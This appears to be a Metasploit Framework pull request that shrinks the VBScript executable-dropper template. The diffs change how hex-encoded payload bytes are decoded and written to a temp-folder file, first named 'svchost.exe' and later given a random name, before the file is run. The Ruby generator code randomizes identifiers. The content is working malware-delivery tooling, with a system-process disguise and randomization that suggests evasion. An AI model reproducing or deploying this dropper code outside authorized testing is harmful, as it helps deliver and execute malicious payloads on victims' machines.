### PR TITLE
Vbs minimize

### DIFF
--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -1,5 +1,5 @@
 Function %{var_func}()
-%{var_shellcode}
+	%{var_shellcode} = "%{var_hex_shellcode}"
 
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@@ -12,7 +12,9 @@ Function %{var_func}()
 	%{var_obj}.CreateFolder(%{var_basedir})
 	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
 	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	%{var_stream}.Write %{var_bytes}
+	For i = 1 to Len(%{var_shellcode}) Step 2
+	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
+	Next
 	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")

--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -10,7 +10,7 @@ Function %{var_func}()
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
-	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	%{var_tempexe} = %{var_basedir} & "\" & "%{var_exe}"
 	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
 	For i = 1 to Len(%{var_shellcode}) Step 2
 	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))

--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -1,5 +1,5 @@
 Function %{var_func}()
-	%{var_shellcode} = "%{var_hex_shellcode}"
+	%{var_shellcode} = "%{hex_shellcode}"
 
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@@ -10,7 +10,7 @@ Function %{var_func}()
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
-	%{var_tempexe} = %{var_basedir} & "\" & "%{var_exe}"
+	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
 	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
 	For i = 1 to Len(%{var_shellcode}) Step 2
 	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -825,6 +825,7 @@ def self.to_vba(framework,code,opts={})
 
     hash_sub = {}
     hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
     hash_sub[:var_fname]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_func]    = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_stream]  = Rex::Text.rand_text_alpha(rand(8)+8)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -825,7 +825,7 @@ def self.to_vba(framework,code,opts={})
 
     hash_sub = {}
     hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
+    hash_sub[:exe_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
     hash_sub[:var_fname]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_func]    = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_stream]  = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -835,7 +835,7 @@ def self.to_vba(framework,code,opts={})
     hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
 
-    hash_sub[:var_hex_shellcode] = exes.unpack('H*').join('')
+    hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
 
     hash_sub[:init] = ""
 

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -824,8 +824,7 @@ def self.to_vba(framework,code,opts={})
     persist = opts[:persist] || false
 
     hash_sub = {}
-    hash_sub[:var_shellcode] = ""
-    hash_sub[:var_bytes]   = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
+    hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_fname]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_func]    = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_stream]  = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -835,7 +834,7 @@ def self.to_vba(framework,code,opts={})
     hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
 
-    hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes])
+    hash_sub[:var_hex_shellcode] = exes.unpack('H*').join('')
 
     hash_sub[:init] = ""
 


### PR DESCRIPTION
Reduces VBS payload size from 599KB to 145KB.

Can be combined with https://github.com/rapid7/metasploit-framework/pull/2320 to reduce to 10Kb. 

Guess could use the Base64 stuff from the cmd stager to go further... Didn't realise they were completely separate!
